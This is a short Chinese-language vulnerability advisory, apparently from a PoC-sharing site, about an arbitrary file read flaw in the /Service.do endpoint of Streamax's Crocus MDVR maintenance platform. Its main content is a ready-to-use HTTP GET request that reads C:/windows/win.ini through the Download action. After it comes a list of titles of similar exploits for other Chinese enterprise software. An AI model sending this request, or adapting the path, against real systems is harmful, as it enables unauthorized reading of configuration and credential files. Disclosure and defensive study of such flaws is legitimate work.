漏洞描述
Crocus 是针对锐明车载MDVR在日常维护时使用的工作平台。Crocus 的 /Service.do 接口存在文件读取漏洞,攻击者可利用该漏洞获取系统的敏感信息,例如配置文件或其他重要数据,可能导致信息泄露和系统安全风险。
锐明 Crocus 运维平台 /Service.do 文件读取漏洞
PoC代码
GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1相关漏洞推荐
- 九佳易 /Service/Ajax_XT.ashx SQL 注入漏洞
- 同享人力资源管理系统 /Service/DownloadTemplate.asmx 文件读取漏洞
- 锐明技术Crocus系统 DeviceFileUpload.do 文件读取漏洞
- 同享人力资源管理系统-TXEHR V15 /Service/SFZService.asmx SQL 注入漏洞
- POC 同享人力资源管理系统 /Service/EmployeeInfoService.asmx SQL 注入漏洞
- 锐明技术 Crocus系统 DeviceFileUpload.do 任意文件读取漏洞
- 锐明技术Crocus /MemoryState.do?Action=Query SQL 注入漏洞
- 锐明技术Crocus系统 DeviceFileUpload.do 任意文件读取漏洞
- 博硕 工程拌和站智能管理平台 /Service/RESTFulWebService/RESTFulServiceForWeb.asmx/Do 权限绕过漏洞
- 用友 U8 Cloud /ServiceDispatcherServlet IFileTrans 文件上传漏洞
- 用友 U8 Cloud /ServiceDispatcherServlet IPFxxFileService 文件上传漏洞
- POC 爱数 AnyShare智能内容管理平台 /api/ServiceAgent/stop_service 命令执行漏洞
- 金蝶天燕 /ormrpc/services/ServiceFactoryService 命令执行漏洞